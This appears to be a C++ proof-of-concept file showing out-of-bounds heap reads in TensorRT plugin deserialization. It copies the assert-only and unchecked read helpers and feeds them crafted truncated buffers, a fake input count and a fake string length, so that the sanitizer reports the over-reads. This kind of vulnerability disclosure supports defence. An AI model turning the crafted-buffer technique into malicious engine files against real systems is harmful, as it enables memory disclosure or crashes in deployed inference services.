File size: 10,284 Bytes
e00c466
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
/*
 * PoC: Out-of-bounds heap read in TensorRT plugin deserialization
 *
 * Vulnerability: TensorRT's serialize.hpp uses assert()-only bounds checking,
 * which is compiled out in release builds (NDEBUG defined). The read<T>()
 * function in plugin.h has ZERO bounds checking. When a malicious TensorRT
 * engine file (.trt/.engine/.plan) contains a plugin with truncated or
 * crafted serialization data, the deserialization reads past the buffer
 * boundary.
 *
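 * This PoC describes two bugs in serialize.hpp. Only the string path (2) is
 * exercised below (PoC 2); PoC 1 instead exercises the unchecked read<T>()
 * helper from plugin.h. The vector path (1) relies on the same assert-only
 * check and is listed for completeness.
 *
 * 1. serialize.hpp vector deserialization (line 101-112):
 *    - Reads attacker-controlled `size` from buffer
 *    - Resizes vector to `size` (so a crafted count can also force a large
 *      allocation before any check runs)
 *    - Computes nbyte = size * sizeof(T) (as written, resize() runs first and
 *      rejects counts above max_size(), which in practice keeps this product
 *      from wrapping)
 *    - assert(*buffer_size >= nbyte) — NO-OP in release
 *    - memcpy from buffer with no bounds check
 *
 * 2. serialize.hpp string deserialization (line 128-138):
 *    - Reads attacker-controlled `nbyte` from buffer
 *    - Resizes string to nbyte
 *    - assert(*buffer_size >= nbyte) — NO-OP in release
 *    - memcpy from buffer with no bounds check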
 *
 * Affected code:
 *   - TensorRT/plugin/common/serialize.hpp:55-61 (POD deserialize)
 *   - TensorRT/plugin/common/serialize.hpp:101-112 (vector deserialize)
 *   - TensorRT/plugin/common/serialize.hpp:128-138 (string deserialize)
 *   - TensorRT/plugin/common/plugin.h:100-108 (read<T>() β€” zero checks)
 *
 * All 30+ TensorRT plugins that use these primitives are affected.
 *
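 * Build and run (C++17 is required for std::is_arithmetic_v / std::is_enum_v):
 *   # Debug (assert enabled — catches the bug):
 *   g++ -std=c++17 -fsanitize=address -g -o poc_debug poc_tensorrt_serialize.cpp
 *   ./poc_debug
 *
 *   # Release (assert disabled — ASAN catches OOB read):
 *   g++ -std=c++17 -fsanitize=address -g -DNDEBUG -o poc_release poc_tensorrt_serialize.cpp
 *   ./poc_release
 *
 *   Note: by default ASAN aborts at the first error it reports, so in both
 *   builds the out-of-bounds read in PoC 1 ends the run before PoC 2 (and, in
 *   the debug build, its assert) is reached. To observe PoC 2 in the same
 *   run, build with -fsanitize-recover=address and run with
 *   ASAN_OPTIONS=halt_on_error=0.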
 */

#include <cassert>
#include <cstdint>
#include <cstring>
#include <iostream>
#include <string>
#include <type_traits>
#include <vector>

// ============================================================================
// Copied verbatim from TensorRT/plugin/common/serialize.hpp
// ============================================================================

// Forward declarations: the vector and string Serializer specializations below
// call serialize_value()/deserialize_value() for their size_t length prefix,
// before these functions are defined after the anonymous namespace.
template <typename T>
inline void serialize_value(void** buffer, T const& value);

template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value);

// File-local (anonymous namespace) Serializer specializations. Each one provides
// serialized_size(), serialize() and deserialize() for one family of types;
// serialize_value()/deserialize_value() dispatch to them through Serializer<T>.
namespace
{

// Primary template: intentionally empty, so (de)serializing a type that matches
// none of the specializations below fails to compile (no serialize/deserialize).
template <typename T, class Enable = void>
struct Serializer
{
};

// POD serializer — assert-only bounds check.
// Handles arithmetic and enum types by copying their raw bytes with memcpy
// (in-memory byte order; no alignment requirement on the buffer).
template <typename T>
struct Serializer<T, typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
    // Bytes written by serialize(): exactly sizeof(T).
    static size_t serialized_size(T const&)
    {
        return sizeof(T);
    }
    // Writes sizeof(T) bytes at *buffer and advances *buffer past them. There is
    // no capacity argument; the caller must have sized the buffer beforehand.
    static void serialize(void** buffer, T const& value)
    {
        ::memcpy(*buffer, &value, sizeof(T));
        reinterpret_cast<char*&>(*buffer) += sizeof(T);
    }
    // Reads sizeof(T) bytes from *buffer into *value, advances *buffer and
    // decrements *buffer_size. The assert is the only length check: with NDEBUG
    // a short buffer is over-read, and because size_t is unsigned, *buffer_size
    // wraps around to a huge value, hiding the truncation from later reads.
    static void deserialize(void const** buffer, size_t* buffer_size, T* value)
    {
        assert(*buffer_size >= sizeof(T));  // NO-OP when NDEBUG is defined!
        ::memcpy(value, *buffer, sizeof(T));
        reinterpret_cast<char const*&>(*buffer) += sizeof(T);
        *buffer_size -= sizeof(T);
    }
};

// Vector serializer — assert-only bounds check.
// Format: a size_t element count (through the POD serializer above) followed by
// the raw bytes of the elements. Only vectors of arithmetic/enum types match.
template <typename T>
struct Serializer<std::vector<T>,
    typename std::enable_if_t<std::is_arithmetic_v<T> || std::is_enum_v<T>>>
{
    // Bytes written by serialize(): the count prefix plus the element bytes.
    static size_t serialized_size(std::vector<T> const& value)
    {
        return sizeof(value.size()) + value.size() * sizeof(T);
    }
    static void serialize(void** buffer, std::vector<T> const& value)
    {
        serialize_value(buffer, value.size());
        size_t nbyte = value.size() * sizeof(T);
        ::memcpy(*buffer, value.data(), nbyte);
        reinterpret_cast<char*&>(*buffer) += nbyte;
    }
    // The element count is read from the buffer itself and trusted as-is.
    // resize(size) runs before any length check, so a crafted count can also
    // force a large allocation (or make resize() throw). nbyte is computed from
    // the already-resized vector.
    // NOTE(review): because resize() must succeed first, size * sizeof(T) is in
    // practice bounded by max_size() * sizeof(T) and should not wrap — confirm.
    static void deserialize(void const** buffer, size_t* buffer_size, std::vector<T>* value)
    {
        size_t size;
        deserialize_value(buffer, buffer_size, &size);
        value->resize(size);
        size_t nbyte = value->size() * sizeof(T);
        assert(*buffer_size >= nbyte);  // NO-OP when NDEBUG is defined!
        ::memcpy(value->data(), *buffer, nbyte);
        reinterpret_cast<char const*&>(*buffer) += nbyte;
        *buffer_size -= nbyte;
    }
};

// String serializer — assert-only bounds check.
// Format: a size_t byte count followed by the raw characters (no terminator).
template <>
struct Serializer<std::string>
{
    // Bytes written by serialize(): the count prefix plus the characters.
    static size_t serialized_size(std::string const& value)
    {
        return sizeof(value.size()) + value.size();
    }
    static void serialize(void** buffer, std::string const& value)
    {
        size_t nbyte = value.size();
        serialize_value(buffer, nbyte);
        ::memcpy(*buffer, value.data(), nbyte);
        reinterpret_cast<char*&>(*buffer) += nbyte;
    }
    // Same pattern as the vector case: the length comes from the buffer, the
    // string is resized to it, and only assert() compares it with *buffer_size
    // before memcpy reads nbyte bytes. Both asserts vanish under NDEBUG.
    static void deserialize(void const** buffer, size_t* buffer_size, std::string* value)
    {
        size_t nbyte;
        deserialize_value(buffer, buffer_size, &nbyte);
        value->resize(nbyte);
        assert(value->size() == nbyte);
        assert(*buffer_size >= nbyte);  // NO-OP when NDEBUG is defined!
        // For a non-const std::string, data() already returns char* in C++17;
        // the const_cast is redundant there.
        ::memcpy(const_cast<char*>(value->data()), *buffer, nbyte);
        reinterpret_cast<char const*&>(*buffer) += nbyte;
        *buffer_size -= nbyte;
    }
};

} // namespace

// Serializes `value` at *buffer using the matching Serializer<T> specialization;
// the specialization advances *buffer past the bytes it wrote. No capacity check
// is performed here — the caller is responsible for sizing the buffer.
template <typename T>
inline void serialize_value(void** buffer, T const& value)
{
    Serializer<T>::serialize(buffer, value);
}

// Deserializes into *value from *buffer using the matching Serializer<T>
// specialization, which advances *buffer and decrements *buffer_size by the bytes
// consumed. Bounds are checked only by assert() inside the specializations, so
// with NDEBUG defined a short buffer is read past its end.
template <typename T>
inline void deserialize_value(void const** buffer, size_t* buffer_size, T* value)
{
    Serializer<T>::deserialize(buffer, buffer_size, value);
}

// ============================================================================
// Copied verbatim from TensorRT/plugin/common/plugin.h
// ============================================================================

// Reads one OutType from the byte cursor `buffer` and advances the cursor by
// sizeof(OutType). The value is copied with memcpy, so the source bytes need not
// be aligned for OutType.
// There is no length parameter and no bounds check of any kind (not even an
// assert): the caller alone must guarantee that sizeof(OutType) readable bytes
// remain, otherwise this reads past the end of the buffer.
template <typename OutType, typename BufferType>
OutType read(BufferType const*& buffer)
{
    // Ensures `buffer += sizeof(OutType)` below advances by bytes.
    static_assert(sizeof(BufferType) == 1, "BufferType must be a 1 byte type.");
    OutType val{};
    std::memcpy(&val, static_cast<void const*>(buffer), sizeof(OutType));
    buffer += sizeof(OutType);
    return val;
}

// ============================================================================
// PoC: Simulate deserializing a malicious plugin from a truncated buffer
// ============================================================================

// Simulates the FlattenConcat plugin deserialization pattern (flattenConcat.cpp:59-78)
// with a truncated/malicious buffer.
//
// A real FlattenConcat expects: bool + int32 + int32 + int32 + (mNumInputs * int32) + ...
// This PoC provides only the 13-byte header, with no padding:
//   offset 0      bool    mIgnoreBatch
//   offset 1..4   int32   mConcatAxisID
//   offset 5..8   int32   mOutputConcatAxis
//   offset 9..12  int32   mNumInputs  (attacker-controlled, set to 1000)
// The header reads stay in bounds. The next read<int32_t>() is the first of the
// mNumInputs per-input values the plugin would read next, and it lies entirely past
// the end of the heap allocation.
void poc_read_oob()
{
    std::cout << "\n=== PoC 1: read<T>() OOB read (plugin.h pattern) ===" << std::endl;
    std::cout << "Simulating FlattenConcat plugin deserialization with truncated buffer\n" << std::endl;

    // Header field values the attacker places in the serialized plugin.
    constexpr bool kIgnoreBatch = false;
    constexpr int32_t kConcatAxisID = 1;
    constexpr int32_t kOutputConcatAxis = 0;
    constexpr int32_t kNumInputs = 1000; // claims 1000 per-input entries follow; none do

    // Heap buffer sized to exactly the header, so the first read past it is a
    // heap-buffer-overflow read (as reported by ASAN).
    std::vector<char> buffer(sizeof(bool) + 3 * sizeof(int32_t));

    // The leading bool shifts every int32 to an unaligned offset, so write the fields
    // with memcpy instead of through reinterpret_cast'ed int32_t pointers (which would
    // be misaligned, aliasing-violating stores — UB unrelated to the bug shown here).
    char* wp = buffer.data();
    auto const put = [&wp](auto const& field) {
        std::memcpy(wp, &field, sizeof(field));
        wp += sizeof(field);
    };
    put(kIgnoreBatch);      // mIgnoreBatch
    put(kConcatAxisID);     // mConcatAxisID
    put(kOutputConcatAxis); // mOutputConcatAxis
    put(kNumInputs);        // mNumInputs

    char const* d = buffer.data();
    bool ignoreBatch = read<bool>(d);
    int32_t concatAxisID = read<int32_t>(d);
    int32_t outputConcatAxis = read<int32_t>(d);
    int32_t numInputs = read<int32_t>(d); // last 4 bytes of the buffer — still in bounds

    std::cout << "ignoreBatch=" << ignoreBatch << " concatAxisID=" << concatAxisID
              << " outputConcatAxis=" << outputConcatAxis << " numInputs=" << numInputs << std::endl;

    // d now points one past the end of the allocation; read<T>() has no way to notice.
    std::cout << "Next read goes OOB..." << std::endl;
    int32_t oob_value = read<int32_t>(d); // <-- HEAP BUFFER OVERFLOW READ
    std::cout << "OOB read value: " << oob_value << std::endl;
}

// Demonstrates the string deserialization with a crafted length: the size_t length
// prefix claims a 256-byte string, but only 8 bytes of string data follow it.
void poc_string_deserialize_oob()
{
    std::cout << "\n=== PoC 2: String deserialization OOB (serialize.hpp) ===" << std::endl;

    // Buffer layout: [size_t length = 256][8 bytes of 'B'].
    // In release builds (NDEBUG) the assert is removed and memcpy reads 256 bytes from a
    // position with only 8 bytes remaining, i.e. 248 bytes past the end of the allocation.
    const size_t fake_length = 256;  // claim string is 256 bytes
    const size_t actual_data = 8;    // but only provide 8 bytes after the length field

    const size_t total_buf_size = sizeof(size_t) + actual_data;
    // std::vector owns the heap allocation (exactly total_buf_size bytes, so ASAN reports
    // the over-read as heap-buffer-overflow) and releases it on every exit path.
    std::vector<char> buffer(total_buf_size);
    std::memcpy(buffer.data(), &fake_length, sizeof(size_t));       // write the fake length
    std::memset(buffer.data() + sizeof(size_t), 'B', actual_data);  // write 8 bytes of data

    void const* ptr = buffer.data();
    size_t remaining = total_buf_size;

    std::string result;

#ifdef NDEBUG
    std::cout << "NDEBUG defined β€” assert() is disabled, OOB read will occur" << std::endl;
#else
    std::cout << "NDEBUG not defined β€” assert() will catch the bug (this is expected in debug)" << std::endl;
    std::cout << "Recompile with -DNDEBUG to see the OOB read" << std::endl;
#endif

    // deserialize_value will:
    // 1. Read the size_t length (256) from the buffer, leaving remaining == 8
    // 2. Resize the string to 256
    // 3. assert(remaining >= 256) — aborts in debug, NO-OP in release
    // 4. memcpy 256 bytes from a position with only 8 bytes left — OOB READ
    deserialize_value(&ptr, &remaining, &result);

    std::cout << "String length: " << result.size() << std::endl;
    std::cout << "First 8 chars: " << result.substr(0, 8) << std::endl;
}

// Entry point: prints the banner and build mode, then runs the PoCs.
//
// Usage: <binary> [1|2]
//   (no argument)  run PoC 1 and then PoC 2, in that order
//   1 or 2         run only that PoC
// By default AddressSanitizer stops the process at the first error it reports. When both
// PoCs run in one process under ASAN, PoC 1's out-of-bounds read therefore ends the run and
// PoC 2 never executes. Passing "2" makes the string-deserialization PoC (and, in debug
// builds, its assert) observable on its own.
int main(int argc, char** argv)
{
    std::cout << "TensorRT Plugin Deserialization PoC" << std::endl;
    std::cout << "====================================" << std::endl;

#ifdef NDEBUG
    std::cout << "Build mode: RELEASE (NDEBUG defined β€” assert() disabled)" << std::endl;
#else
    std::cout << "Build mode: DEBUG (assert() enabled)" << std::endl;
#endif

    char const* const which = (argc > 1) ? argv[1] : nullptr;
    bool const runRead = (which == nullptr) || std::strcmp(which, "1") == 0;
    bool const runString = (which == nullptr) || std::strcmp(which, "2") == 0;

    if (!runRead && !runString)
    {
        // Only reachable with argc > 1, so argv[0] is valid here.
        std::cerr << "usage: " << argv[0] << " [1|2]" << std::endl;
        return 2;
    }

    if (runRead)
    {
        poc_read_oob();
    }
    if (runString)
    {
        poc_string_deserialize_oob();
    }

    return 0;
}